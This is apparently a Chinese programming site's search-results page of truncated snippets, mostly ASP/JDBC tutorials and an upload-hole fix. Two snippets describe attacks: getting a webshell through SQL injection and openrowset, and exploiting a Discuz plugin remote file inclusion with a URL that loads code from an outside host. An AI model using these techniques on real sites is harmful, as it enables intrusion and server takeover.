搜索列表
-
ASP编程入门进阶(七):内置对象Server
【ASP编程】Server 对象提供对服务器上的方法和属性的访问 , 其中大多数方法和属性是作为实用程序的功能服务。(IIS HELP翻译)有了 Server 对象,你就可以在服务器上启动 ActiveX 对象例程,并使用 Active Server 服务提供象 HTML 和 URL 编码这样的函数。一,Script.ScriptTimeout在脚本运行超过一段时间之后,即作...
ASP编程入门进阶(七):内置对象Server -
ASP编程入门进阶(十三):Ad & Content Rotator
【ASP编程】ASP的强大不仅仅局限于接受和显示的交互,更多的是运用ActiveX 组件进行更强大的Web应用。那究竟ActiveX组件为何物?它又是如何运作的呢?其实ActiveX Server Components(ActiveX 服务器组件)是一个存在于 WEB 服务器上的文件,该文件包含执行某项或一组任务的代码,组件可以执行公用任务,这样就不必自己去创...
ASP编程入门进阶(十三):Ad&ContentRotator -
ASP编程入门进阶(十八):FSO组件之文件操作(上)
【ASP编程】FSO中除了可以对驱动器、文件夹的操作以外,功能最强大的就是对文件的操作了。它可以用来记数、内容管理、搜索还可生成动态HTML页面等等。一、fso.OpenTextFile无需多说,fso.OpenTextFile就是打开某个文件了,一般情况之下是打开的txt文本文件。所以首先我们先建立一个txt文件,然后通过FSO来读取其中的内容。...
ASP编程入门进阶(十八):FSO组件之文件操作(上) -
ASP编程入门进阶(十八):FSO组件之文件操作(下)
【ASP编程】一,fso.GetFile提取文件相应的 File 对象1,getfile.asp <%whichfile=Server.MapPath("cnbruce.txt")Set fso = CreateObject("Scripting.FileSystemObject")Set f1 = fso.CreateTextFile(whichfile,true)f1.Write ("This is a test.My Name is cnbruce.")f1.CloseSet f2 = fso.GetFile(whi...
ASP编程入门进阶(十八):FSO组件之文件操作(下) -
ASP编程入门进阶(二十):ADO组件之显示数据记录
【ASP编程】学习ASP的万里长征就快到终点了:等把ASP的ADO组件搞定。当然这也是最重要的一步,几乎前面所有的学习都是为了这个最终的目的。OK,下面就来详细系统地来一一掌握,步步为营,各个击破。一,拥有数据库可以这么说:静态页面和动态页面最大的区别就是采用了数据库。有关一个WEB程序采用数据库和不采用的优越性比较...
ASP编程入门进阶(二十):ADO组件之显示数据记录 -
JDBC板块精华整理20051226
【JSP编程】重要提示:本文部分内容是斑竹从网上搜集整理而来,如果您认为该文档的内容侵犯了您的权益,请与整理者(excelarthur@yahoo.com.cn)联系,与dev2dev网站无关。 JDBC3.0的特性 1、JDBC3.0规范中数据库连接池框架 JDBC3.0规范中通过提供了一个支持数据库连接池的框架,这个框架仅仅规定了如何支持连接池的...
JDBC板块精华整理20051226 -
渗透中用openrowset搞shell的方法
【安全相关】渗透中用openrowset搞shell的方法 得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了. 联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事...
渗透中用openrowset搞shell的方法 -
解决ASP(图像)上传漏洞的方法
【ASP编程】经常听说的ASP上传漏洞,即是将一些木马文件修改后缀名(修改为图像文件后缀),进行上传。 针对此情况使用下列函数进行辨别:复制代码 代码如下:<% '****************************************************************** 'CheckFileType 函数用来检查文件是否为图片文件 '参数filename是本地文件的路径 '如...
解决ASP(图像)上传漏洞的方法 -
如何实现文件上传并自动归类功能?
【编程10000问】upload.asp <form action=http://<%= Request. ServerVariables(SERVER_NAME)>/wdread.asp method=post> <p>主题: <input type=text name=subject><br> 作者:<input name=author type=text><br> ...
|如何|何实|实现|现文|文件|件上|上传|传并|并自|自动|动归|归类|类功|功能|能?|?| -
如何对文件进行操作?
【编程10000问】<%@ LANGUAGE="VBScript" %><% 'Set file i/o constants. Const ForReading = 1 Const ForWriting = 2 Const ForAppending = 8 filename = "test.txt" path = Server.MapPath("data") & "\" & filename ' 映射...
|如何|何对|对文|文件|件进|进行|行操|操作|作?|?| -
ASP问答集
【编程10000问】问:为什么我的记录集的RecordCount值总是返回-1? 答:你应当使用这种模式来打开存取数据库的记录集: rec.open strSQL,conn,1,1 其中的strSQL是操作数据库的SQL语句;conn是联接数据库的Connection 变量。 问:我在ASP脚本中写了很多的注释...
|AS|SP|P问|问答|答集|集| -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞